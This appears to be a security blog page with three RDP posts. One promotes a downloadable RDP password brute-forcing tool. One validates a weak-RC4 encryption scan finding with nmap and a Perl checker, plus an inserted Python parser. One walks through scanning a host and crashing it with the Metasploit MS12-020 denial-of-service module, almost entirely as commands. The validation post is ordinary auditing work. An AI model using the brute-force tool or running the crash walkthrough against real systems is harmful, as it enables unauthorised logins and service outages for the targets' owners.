Showing posts with label rdp. Show all posts

Thursday, 24 October 2013

RDP Auditing Tool

Tired of testing or brute forcing with individual credentials one at a time? Fear not, xTSCrack is here to make it automatic!


You can download the tool from: http://www.4shared.com/get/HTJog7YJ/xtscrack-09.html

This tool has the following cool features:
---> Test for weak password automatically;
---> Test for weak/user passwords;
---> Wordlist option;
---> Userlist option;
---> Configurable port;
---> Range IP Address audit and more.


The main window

Inputting the Userlist and Wordlist

Password Found!!!



Tuesday, 6 August 2013

Windows Remote Desktop Protocol Weak Encryption Method Allowed - Validating the Findings

Results from Qualys Scan

ISSUE:
-Windows Remote Desktop Protocol Weak Encryption Method Allowed

THREAT:
Remote Desktop Protocol is a protocol by which Terminal Service provides desktop level access to a remote user. It can be used to remotely login and interact with a Windows machine.
Since RDP transfers sensitive information about the user and the system, it can be configured to use encryption to provide privacy and integrity for its sessions. It is possible to configure RDP to use encryption algorithms that are considered insecure, such as RC4 40bit and RC4 56 bit.

IMPACT:
If an attacker has access to the network traffic with RDP sessions using weak encryption methods, then it will be possible for them to bruteforce the encryption parameters and compromise privacy of the RDP session.

SOLUTION:
RDP needs to be configured to use strong encryption methods or use SSL as the privacy and integrity provider. To configure RDP encryption methods 'Terminal Services Configuration' snap-in can be launched in mmc.exe. In 'Terminal Services Configuration' properties dialog box General tab for the Encryption Level 'High' should be selected.

LINKS:
http://technet.microsoft.com/en-us/library/cc770833.aspx
https://www.fishnetsecurity.com/6labs/blog/remote-desktop-protocol-security-creating-successful-implementation


Validating the Findings
To validate the findings, we use additional tools to see whether we get the same output as the Qualys scan. In this case, Qualys detected that the encryption algorithms used are RC4 40-bit and RC4 56-bit, so our objective is to get that same information from other tools.

Using NMAP

nmap -p 3389 --script rdp-enum-encryption <ip>
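
One way to turn that scan output into a repeatable check against the Qualys finding, as an added example that is not part of the original post. The sample output is constructed, its layout is assumed to follow what the rdp-enum-encryption script prints, and the function name audit_rdp_encryption is hypothetical.

```python
import re

# Constructed sample of `nmap -p 3389 --script rdp-enum-encryption` output
# (layout assumed from the script's usual format; not taken from a real host).
SAMPLE = """\
PORT     STATE SERVICE
3389/tcp open  ms-wbt-server
| rdp-enum-encryption:
|   Security layer
|     CredSSP: SUCCESS
|     Native RDP: SUCCESS
|     SSL: SUCCESS
|   RDP Encryption level: Client Compatible
|     40-bit RC4: SUCCESS
|     56-bit RC4: SUCCESS
|     128-bit RC4: SUCCESS
|_    FIPS 140-1: SUCCESS
"""

# The two methods the Qualys finding names as insecure.
WEAK_METHODS = {"40-bit RC4", "56-bit RC4"}

# Matches "|   name: value" and "|_  name: value" lines of NSE script output.
LINE = re.compile(r"^\|_?\s+(?P<name>[^:]+):\s*(?P<value>.+?)\s*$")


def audit_rdp_encryption(nmap_output):
    """Return (encryption_level, accepted_methods, weak_methods_accepted)."""
    level, accepted = None, []
    for raw in nmap_output.splitlines():
        m = LINE.match(raw)
        if not m:
            continue  # host/port lines and section headers carry no value
        name, value = m.group("name").strip(), m.group("value")
        if name == "RDP Encryption level":
            level = value
        elif value == "SUCCESS" and name.endswith(("RC4", "FIPS 140-1")):
            accepted.append(name)  # encryption methods only, not security layers
    weak = sorted(WEAK_METHODS.intersection(accepted))
    return level, accepted, weak


if __name__ == "__main__":
    level, accepted, weak = audit_rdp_encryption(SAMPLE)
    print("Encryption level:", level)
    print("Accepted methods:", ", ".join(accepted))
    print("Finding confirmed:" if weak else "Finding not reproduced:", weak)
```

Running it on output captured before and after the Encryption Level change from the SOLUTION section gives a direct before/after comparison.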


Using Perl Script

Download the package using wget
#wget http://labs.portcullis.co.uk/download/rdp-sec-check-0.8.tar.gz

Extract the package
#tar -xvzf rdp-sec-check-0.8.tar.gz

Run the script
#./rdp-sec-check.pl <IP address>





Thursday, 30 May 2013

NMAP & Metasploit - Scan and Exploit in 10mins

READY, SCAN, ATTACK!!!


First, we will find a target and ensure the host is up. We will do this by using Nmap:
#nmap -sn 192.168.71.156


Once we know the host is up and running, we will use Nmap to find any critical vulnerabilities. We invoke the command:

#nmap --script vuln 192.168.71.156 --reason

With this command, Nmap runs its NSE vuln scripts against the host and scans it for vulnerabilities. Once the scan has completed, the results list the vulnerabilities found on the host, and even provide a link to more information about each vulnerability.



Now let's exploit that vulnerability! First we need to check whether the exploit is in the Metasploit database. On your terminal, run

#locate ms12_020

The output shows that the exploit is available in Metasploit.

Alternatively, you can search for the exploit in msfconsole itself by firing up #msfconsole and then running
#search ms12_020


Now that we know the exploit is available, we will execute it.

msf > use auxiliary/dos/windows/rdp/ms12_020_maxchannelids
msf  auxiliary(ms12_020_maxchannelids) > set RHOST 192.168.71.156
msf  auxiliary(ms12_020_maxchannelids) > set RPORT 3389
msf  auxiliary(ms12_020_maxchannelids) > run


Once executed, the server will crash!!! Note that this is a Layer 7 DoS attack!